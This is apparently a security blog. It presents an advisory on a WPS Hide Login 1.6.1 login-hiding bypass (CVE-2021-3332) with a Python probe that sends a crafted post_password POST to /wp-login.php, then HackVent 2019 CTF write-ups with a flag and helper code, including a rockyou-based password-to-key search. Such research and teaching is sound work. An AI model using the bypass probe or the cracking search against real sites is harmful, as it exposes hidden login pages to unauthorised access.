Sebastian's Blog

software developer. security enthusiast.

WPS Hide Login 1.6.1 Protection Bypass (CVE-2021-3332)

The protection offered by WPS Hide Login can be bypassed by sending a crafted POST request containing the field post_password to the default WordPress login URL /wp-login.php. In the file /classes/plugin.php, on line 494, the plugin explicitly checks for the absence of this POST field but defines no else case, so a request that carries the field (with any value) is not blocked and reaches the normal login page.
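
To check a site for this behaviour, the following probe script (an added example, not code from the advisory or from the plugin) assumes only what the advisory states: a plain request to /wp-login.php should be blocked, while the same request carrying a post_password field should not. The login-form markers it looks for (the stock WordPress form id and the log/pwd input names), the User-Agent string and the treatment of anything other than a 200 page containing that form as "blocked" are my assumptions.

```python
import urllib.error
import urllib.parse
import urllib.request

LOGIN_URL_PATH = "/wp-login.php"
# Markers of the stock WordPress login form (assumption: a 200 response that
# carries all three means the hidden-login gate did not fire).
LOGIN_FORM_MARKERS = ('id="loginform"', 'name="log"', 'name="pwd"')


def build_request(base_url, with_post_password):
    """Build the request for /wp-login.php.

    with_post_password=False is the control request the plugin is expected to
    block; True adds the post_password field (any value), which the vulnerable
    check in plugin.php treats as a reason not to block the request.
    """
    url = base_url.rstrip("/") + LOGIN_URL_PATH
    headers = {"User-Agent": "wps-hide-login-check (added example)"}
    if not with_post_password:
        return urllib.request.Request(url, headers=headers, method="GET")
    body = urllib.parse.urlencode({"post_password": "x"}).encode()
    headers["Content-Type"] = "application/x-www-form-urlencoded"
    return urllib.request.Request(url, data=body, headers=headers, method="POST")


def login_form_exposed(status, html):
    """True when the response is the real WordPress login page."""
    return status == 200 and all(marker in html for marker in LOGIN_FORM_MARKERS)


def fetch(request, timeout=10):
    """Return (status, body); HTTP error responses (e.g. a 404 page) are data, not failures."""
    try:
        with urllib.request.urlopen(request, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def probe(base_url):
    """Return (control_exposed, bypass_exposed); (False, True) means the bypass works."""
    control = login_form_exposed(*fetch(build_request(base_url, False)))
    bypass = login_form_exposed(*fetch(build_request(base_url, True)))
    return control, bypass


if __name__ == "__main__":
    import sys

    control, bypass = probe(sys.argv[1])
    print(f"login form reachable without post_password: {control}")
    print(f"login form reachable with post_password:    {bypass}")
    print("bypass confirmed" if bypass and not control else "bypass not confirmed")
```

Run it as `python3 probe.py https://target.example/` against a site you are authorised to test; the control request matters, because a site that serves the login form without post_password simply does not have the plugin active and tells you nothing about the bypass.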

HV19.24 ham radio

I didn't solve this during the contest, but I want to share my solution. The zip file contained a binary file named brcmfmac43430-sdio.bin, which is a Broadcom 43430 SDIO firmware. After some time poking around in Ghidra I found the base64-encoded string Um9zZXMgYXJlIHJlZCwgVmlvbGV0cyBhcmUgYmx1ZSwgRHJTY2hvdHRreSBsb3ZlcyBob29raW5nIGlvY3Rscywgd2h5IHNob3VsZG4ndCB5b3U/ which decodes to Roses are red, Violets are blue, DrSchottky loves […]

HV19.23 Internet Data Archive

The page asks for a username and for the files to be downloaded. Downloading the flag is not allowed. Submitting the form leads to another page with a download link and the password for the generated zip file. The generated files are all stored within the /tmp folder. Apache allows indexes on this folder, so sorting the […]

HV19.22 The command … is lost

The attached file turned out to be an Intel HEX file containing some kind of Arduino program. Loading the file in Ghidra and poking around showed some methods which seem to just swap variables around. I recreated this behaviour in Python and got the flag. The flag is HV19{H3y_Sl3dg3_m33t_m3_at_th3_n3xt_c0rn3r}.
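
Before a file like this can be loaded anywhere, the Intel HEX records have to be turned into a flat image, and a corrupted record is better caught by the checksum than by a confusing disassembly. The parser below is an added example (not the author's code and not the challenge file): it handles data, EOF, extended segment/linear address and start address records, validates each record's length and checksum, and collapses the result into contiguous segments. The sample records are constructed for the example.

```python
# Intel HEX record types
DATA, EOF, EXT_SEGMENT, START_SEGMENT, EXT_LINEAR, START_LINEAR = 0, 1, 2, 3, 4, 5


def parse_record(line):
    """Parse one ':LLAAAATT<data>CC' record; raise ValueError on malformed input."""
    line = line.strip()
    if not line.startswith(":"):
        raise ValueError(f"record does not start with ':': {line!r}")
    raw = bytes.fromhex(line[1:])
    if len(raw) < 5:
        raise ValueError(f"record too short: {line!r}")
    count, addr, rtype = raw[0], int.from_bytes(raw[1:3], "big"), raw[3]
    if len(raw) != count + 5:
        raise ValueError(f"byte count {count} does not match record length: {line!r}")
    # The checksum byte is chosen so that all record bytes sum to 0 mod 256.
    if sum(raw) & 0xFF:
        raise ValueError(f"bad checksum: {line!r}")
    return rtype, addr, raw[4:4 + count]


def parse_intel_hex(text):
    """Return ({absolute_address: byte}, start_address_or_None)."""
    memory, base, start = {}, 0, None
    for line in text.splitlines():
        if not line.strip():
            continue
        rtype, addr, payload = parse_record(line)
        if rtype == DATA:
            for offset, byte in enumerate(payload):
                memory[base + addr + offset] = byte
        elif rtype == EOF:
            break
        elif rtype == EXT_SEGMENT:          # 8086-style segment, shifted left by 4
            base = int.from_bytes(payload, "big") << 4
        elif rtype == EXT_LINEAR:           # upper 16 bits of a 32-bit address
            base = int.from_bytes(payload, "big") << 16
        elif rtype in (START_SEGMENT, START_LINEAR):
            start = int.from_bytes(payload, "big")   # entry point, not memory content
        else:
            raise ValueError(f"unknown record type {rtype:#04x}")
    return memory, start


def segments(memory):
    """Collapse the byte map into contiguous (start_address, bytes) chunks."""
    chunks, current, buf = [], None, bytearray()
    for address in sorted(memory):
        if current is not None and address == current + len(buf):
            buf.append(memory[address])
            continue
        if buf:
            chunks.append((current, bytes(buf)))
        current, buf = address, bytearray([memory[address]])
    if buf:
        chunks.append((current, bytes(buf)))
    return chunks


# Constructed sample (not the challenge file): six bytes at 0x0000-0x0005, one
# byte at 0x10000 placed via an extended linear address record, then EOF.
SAMPLE_HEX = """\
:020000040000FA
:0400000000C0FFEE4F
:02000400414277
:020000040001F9
:01000000FF00
:00000001FF
"""

if __name__ == "__main__":
    mem, entry = parse_intel_hex(SAMPLE_HEX)
    for start, data in segments(mem):
        print(f"{start:#010x}: {data.hex()}")
```

Writing each segment to a raw file at its start address gives Ghidra (or any emulator) a proper memory map; for an AVR image the data segment usually starts at 0, which is why the extended address records matter only for larger targets.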

HV19.21 Happy Christmas 256

The information provided was pretty helpful. Ten years ago (2009) there was a big password leak, known as rockyou. As his password is 16 characters long, we only have to check the 16-character passwords from the rockyou wordlist. As Santa uses NIST P-256 with the SHA-256 hash of the password as key, we can simply hash […]
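
The search described above, as an added example rather than the author's script: filter the wordlist to 16-character entries, take SHA-256 of each candidate as the P-256 private scalar, derive the public key and compare it with the target. The curve arithmetic is written out in plain Python so the derivation is visible. Assumptions not stated in the excerpt: the digest is read as a big-endian integer (reduced mod n), the value compared against is Santa's public key, and the wordlist below is a constructed stand-in for rockyou.txt.

```python
import hashlib

# NIST P-256 (secp256r1) domain parameters, as published in SEC 2 / FIPS 186-4.
P = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
A = P - 3
B = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
N = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
G = (0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296,
     0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5)


def is_on_curve(point):
    x, y = point
    return (y * y - (x * x * x + A * x + B)) % P == 0


def point_add(p1, p2):
    """Affine group law; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:          # p1 == -p2
            return None
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P   # doubling
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def scalar_mult(k, point):
    """Double-and-add; fine for a CTF search, not constant time."""
    result, addend = None, point
    while k:
        if k & 1:
            result = point_add(result, addend)
        addend = point_add(addend, addend)
        k >>= 1
    return result


def private_key_from_password(password):
    # Assumption: SHA-256 digest read big-endian and used as the private scalar
    # (reduced mod N); the post does not state the exact encoding.
    digest = hashlib.sha256(password.encode("utf-8")).digest()
    return int.from_bytes(digest, "big") % N


def public_key_from_password(password):
    return scalar_mult(private_key_from_password(password), G)


def recover_password(target_public_key, wordlist, length=16):
    """Try only candidates of the known length, comparing derived public keys."""
    for candidate in wordlist:
        if len(candidate) != length:
            continue
        if public_key_from_password(candidate) == target_public_key:
            return candidate
    return None


# Constructed mini wordlist standing in for rockyou.txt (not shipped here).
WORDLIST = ["123456", "iloveyou", "abcdefghijklmnop", "rudolphrednose01",
            "password1234567890"]

if __name__ == "__main__":
    target = public_key_from_password("rudolphrednose01")   # stand-in for Santa's key
    print(recover_password(target, WORDLIST))
```

For the real wordlist, read rockyou.txt with `encoding="latin-1"` (it is not valid UTF-8 throughout) and strip the newline before measuring length; the pure-Python point multiplication costs a few milliseconds per candidate, so for the full set of 16-character entries a C-backed library doing the same scalar multiplication is the practical choice, but the logic stays exactly this.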

HV19.20 i want to play a game

The attached zip file contains a binary named game. Analyzing the file with Ghidra showed that this is a PS4 executable. The code opens the file /mnt/usb0/PS4UPDATE.PUP, validates its MD5 hash and XORs some of the file's content with a key contained in the executable. As Ghidra was unable to properly resolve references, it […]

HV19.19 🎅

I immediately recognized this as Emojicode. The Emojicode debugger has an option to prettify the code, which helped a lot. As the documentation isn't that good, I had to google most of the emojis to find out what's going on. Basically, the program takes some user input. Then it runs over an existing string, […]

HV19.18 Dance with me

The attached zip file contained a binary called dance, which is an actual iOS binary. It asks you for some input and returns the flag. After looking at the crypto implementation I thought that this could be the Salsa20 cipher, which would also fit the name. Analysing the main function and the […]
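
When a disassembly suggests Salsa20, the fingerprints to confirm it are the sixteen-byte constant "expand 32-byte k" (or "expand 16-byte k" for 128-bit keys) split into four little-endian words, and the quarter-round rotation distances 7, 9, 13 and 18. The block below is an added example (not the author's code and not taken from the challenge binary): a compact Salsa20/20 reference implementation in Python to compare a suspected implementation against. The key, nonce and plaintext are constructed.

```python
import struct

MASK = 0xFFFFFFFF
# These constants are the easiest thing to spot in a disassembly.
SIGMA = struct.unpack("<4I", b"expand 32-byte k")   # 256-bit key
TAU = struct.unpack("<4I", b"expand 16-byte k")     # 128-bit key


def rotl32(value, count):
    return ((value << count) & MASK) | (value >> (32 - count))


def quarter_round(y0, y1, y2, y3):
    # Rotation distances 7, 9, 13, 18 are the other fingerprint of Salsa20.
    y1 ^= rotl32((y0 + y3) & MASK, 7)
    y2 ^= rotl32((y1 + y0) & MASK, 9)
    y3 ^= rotl32((y2 + y1) & MASK, 13)
    y0 ^= rotl32((y3 + y2) & MASK, 18)
    return y0, y1, y2, y3


def salsa20_core(state, rounds=20):
    """Salsa20/rounds hash of sixteen 32-bit words: column rounds alternating with row rounds."""
    x = list(state)
    for _ in range(rounds // 2):
        x[0], x[4], x[8], x[12] = quarter_round(x[0], x[4], x[8], x[12])
        x[5], x[9], x[13], x[1] = quarter_round(x[5], x[9], x[13], x[1])
        x[10], x[14], x[2], x[6] = quarter_round(x[10], x[14], x[2], x[6])
        x[15], x[3], x[7], x[11] = quarter_round(x[15], x[3], x[7], x[11])
        x[0], x[1], x[2], x[3] = quarter_round(x[0], x[1], x[2], x[3])
        x[5], x[6], x[7], x[4] = quarter_round(x[5], x[6], x[7], x[4])
        x[10], x[11], x[8], x[9] = quarter_round(x[10], x[11], x[8], x[9])
        x[15], x[12], x[13], x[14] = quarter_round(x[15], x[12], x[13], x[14])
    # Feed-forward: add the input state back so the function is not invertible.
    return [(a + b) & MASK for a, b in zip(x, state)]


def initial_state(key, nonce, counter):
    """Lay out constants, key, nonce and 64-bit block counter as the spec does."""
    if len(key) == 32:
        c, k = SIGMA, struct.unpack("<8I", key)
    elif len(key) == 16:
        c, k = TAU, struct.unpack("<4I", key) * 2   # 128-bit key is used twice
    else:
        raise ValueError("key must be 16 or 32 bytes")
    if len(nonce) != 8:
        raise ValueError("nonce must be 8 bytes")
    n = struct.unpack("<2I", nonce)
    ctr = (counter & MASK, (counter >> 32) & MASK)
    return [c[0], k[0], k[1], k[2], k[3],
            c[1], n[0], n[1], ctr[0], ctr[1],
            c[2], k[4], k[5], k[6], k[7], c[3]]


def salsa20_xor(key, nonce, data, counter=0):
    """Encrypt or decrypt (same operation) by XORing data with the keystream."""
    out = bytearray()
    for offset in range(0, len(data), 64):
        block = salsa20_core(initial_state(key, nonce, counter + offset // 64))
        keystream = struct.pack("<16I", *block)
        out.extend(a ^ b for a, b in zip(data[offset:offset + 64], keystream))
    return bytes(out)


if __name__ == "__main__":
    key, nonce = bytes(range(32)), b"\x00" * 8     # constructed, not from the binary
    ct = salsa20_xor(key, nonce, b"Dance with me")
    print(ct.hex(), salsa20_xor(key, nonce, ct))
```

A quick way to validate a suspected implementation is to feed it an all-zero 64-byte state: the Salsa20 core maps zeros to zeros, and any deviation in rotation amounts or word order shows up immediately. Once the core matches, the remaining questions are only where the key, nonce and counter sit in the state, which the layout in initial_state makes explicit.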

HV19.17 Unicode Portal

After registering and logging in, I got a page showing different Unicode characters and their different representations. The website also allows viewing part of the source code: the registerUser function actually updates a user's password (INSERT INTO … ON DUPLICATE KEY UPDATE password=) if we register with an existing username. But we only […]

HV19.16 B0rked Calculator

After poking around with Ghidra I found the part which checks the input and calls the responsible math functions (which are all NOPs). I used Ghidra's rename feature to rename these functions. Searching for references to these functions shows that they are also called in another part of the program. That part calculates some string […]